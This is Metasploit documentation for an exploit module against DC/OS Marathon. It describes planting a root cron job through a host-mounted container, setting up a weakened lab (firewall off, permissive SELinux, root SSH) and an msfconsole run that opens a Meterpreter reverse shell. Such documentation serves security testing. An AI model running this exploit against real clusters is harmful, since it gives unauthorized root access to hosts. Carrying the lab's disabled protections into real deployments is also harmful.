CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/documentation/modules/exploit/linux/http/dcos_marathon.md
Views: 11789

Vulnerable Application

Utilizing the DCOS Cluster's Marathon UI, an attacker can create a docker container with the '/' path mounted with read/write permissions on the host server that is running the docker container. As the docker container executes command as uid 0 it is honored by the host operating system allowing the attacker to edit/create files owed by root. This exploit abuses this to creates a cron job in the '/etc/cron.d/' path of the host server.

*Notes: The docker image must be a valid docker image from hub.docker.com. Further more the docker container will only deploy if there are resources available in the DC/OS

DCOS

This Exploit was tested with CentOS 7 as the host operating system for the 2 services of the DCOS cluster. With DCOS version 1.7 and 1.8, with Default 'custom' installation for on site premise setup. Only the Install part of the DCOS guide was completed, the system hardening and securing your cluster section where skipped. This is to represent a 'Default' install with a system admin conducting hasty deployments taking no thought about security.

To Setup Your Cluster

I recommend doing a 'on-premise'/custom cluster. https://dcos.io/docs/1.8/administration/installing/custom/ Create a virtual CentOS machine, install requirements base on the above guide.

# The TLDR from the above guide
sudo systemctl stop firewalld && sudo systemctl disable firewalld
sudo yum install -y tar xz unzip curl ipset ntp
sudo systemctl start ntpd
sudo systemctl enable ntpd
sudo sed -i s/SELINUX=enforcing/SELINUX=permissive/g /etc/selinux/config && \
   sudo groupadd nogroup && sudo reboot

Install a supported version of docker on the CentOS systems https://dcos.io/docs/1.8/administration/installing/custom/system-requirements/install-docker-centos/

# The TLDR of the above guide
sudo yum -y remove docker docker-common container-selinux
sudo yum -y remove docker-selinux
sudo yum install -y yum-utils
sudo yum-config-manager \
   --add-repo \
   https://docs.docker.com/engine/installation/linux/repo_files/centos/docker.repo
sudo yum-config-manager --enable docker-testing
sudo yum makecache fast
sudo yum -y install docker-engine-1.11.2
sudo systemctl start docker
sudo systemctl enable docker
sudo echo overlay > /etc/modules-load.d/overlay.conf
sudo reboot

Once the CentOS machine has rebooted, edit the systemctl service file for docker and change the ExecStart- line to ExecStart=/usr/bin/docker daemon --storage-driver=overlay -H fd:// restart the docker service and verify it is running. lastly generate ssh rsa keys for authentication. And update the /etc/ssh/sshd_config file to support root login.

ssh-keygen -t rsa -b 4096
# Press enter until complete, DO NOT PUT A PASSWORD.
cp ~/.ssh/id_rsa.pub ~/.ssh/authorized_keys
cat ~/.ssh/id_rsa # save the output you will need it for later
rm ~/.ssh/id_rsa # before doing this make sure you have saved a copy for later

Shut down the CentOS vm, take a snapshot. (This will be your base) clone the VM 2 times. One will be DCOS-Master, the Other DCOS-Agent. Start the DCOS-Master and DCOS-Agent virtual machines You just cloned. Login and get their current IP address.

  • Note: I recommend giving them static IPs if you have further use for the cluster.

From here use another Linux machine with docker installed to finish the installation process. I used an Ubuntu machine with docker installed.

Follow the custom CLI guide for creating the required files in the genconf folder. https://dcos.io/docs/1.8/administration/installing/custom/cli/

Example genconf/config.yaml

---
agent_list:
- 192.168.0.10
bootstrap_url: file:///opt/dcos_install_tmp
cluster_name: DCOS
exhibitor_storage_backend: static
ip_detect_filename: /genconf/ip-detect
master_discovery: static
master_list:
- 192.168.0.9
process_timeout: 10000
resolvers:
- 8.8.8.8
- 8.8.4.4
ssh_port: 22
ssh_user: root

Example genconf/ip-detect

#!/usr/bin/env bash
set -o nounset -o errexit
export PATH=/usr/sbin:/usr/bin:$PATH
ip=$(ip addr show ens33)
echo $( echo $ip | grep -Eo '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' | head -1)

place your id_rsa ssh key into the genconf file and rename the file to ssh_key and chmod 0600 genconf/ssh_key

Deploying the cluster in the folder containing the genconf folder do the following. NOTE: if following the cli install from DCOS itself, it will fail if you do --install-prereqs. It will install an unsupported version of docker.

curl -O https://downloads.dcos.io/dcos/stable/dcos_generate_config.sh
chmod +x dcos_generate_config.sh
sudo ./dcos_generate_config.sh --genconf
sudo ./dcos_generate_config.sh --preflight
# If all preflight checks pass
sudo ./dcos_generate_config.sh --deploy
# get a cup of coffie
# wait a minute or two after deploy completes
sudo bash dcos_generate_config.sh --postflight

If all is passing navigate to http://[master_ip]:8080/ You should see the Marathon UI web application.

Exploitation

This module is designed for the attacker to leverage, creation of a docker container with out authentication through the DCOS Marathon UI to gain root access to the hosting server of the docker container in the DCOS cluster.

Options

  • DOCKERIMAGE is the hub.docker.com docker container image you are wanting to have the DCOS Cluster to deploy for this exploit.

  • TARGETURI this is the path to make the Marathon UI web request to. By default this is /v2/apps

  • WAIT_TIMEOUT is how long you will wait for a docker container to deploy before bailing out if it does not start.

  • CONTAINER_ID is optional if you want to have your container docker have a human readable name else it will be randomly generated

Steps to exploit with module

  • Start msfconsole

  • use exploit/linux/http/dcos_marathon

  • Set the options appropriately and set VERBOSE to true

  • Verify it creates a docker container and it successfully runs

  • After a minute a session should be opened from the agent server

Scenarios

msf > use exploit/linux/http/dcos_marathon
msf exploit(dcos_marathon) > set RHOST 192.168.0.9
RHOST => 192.168.0.9
msf exploit(dcos_marathon) > set payload python/meterpreter/reverse_tcp
payload => python/meterpreter/reverse_tcp
msf exploit(dcos_marathon) > set LHOST 192.168.0.100
LHOST => 192.168.0.100
msf exploit(dcos_marathon) > set verbose true
verbose => true
msf exploit(dcos_marathon) > check
[*] 192.168.0.9:8080 The target appears to be vulnerable.
msf exploit(dcos_marathon) > exploit

[*] Started reverse TCP handler on 192.168.0.100:4444
[*] Setting container json request variables
[*] Creating the docker container command
[*] The docker container is created, waiting for it to deploy
[*] Waiting up to 60 seconds for docker container to start
[*] The docker container is running, removing it
[*] Waiting for the cron job to run, can take up to 60 seconds
[*] Sending stage (39690 bytes) to 192.168.0.10
[*] Meterpreter session 1 opened (192.168.0.100:4444 -> 192.168.0.10:54468) at 2017-03-01 14:22:02 -0500
[+] Deleted /etc/cron.d/FOWkTeZL
[+] Deleted /tmp/TIWpOfUR

meterpreter > sysinfo
Computer        : localhost.localdomain
OS              : Linux 3.10.0-327.36.3.el7.x86_64 #1 SMP Mon Oct 24 16:09:20 UTC 2016
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter >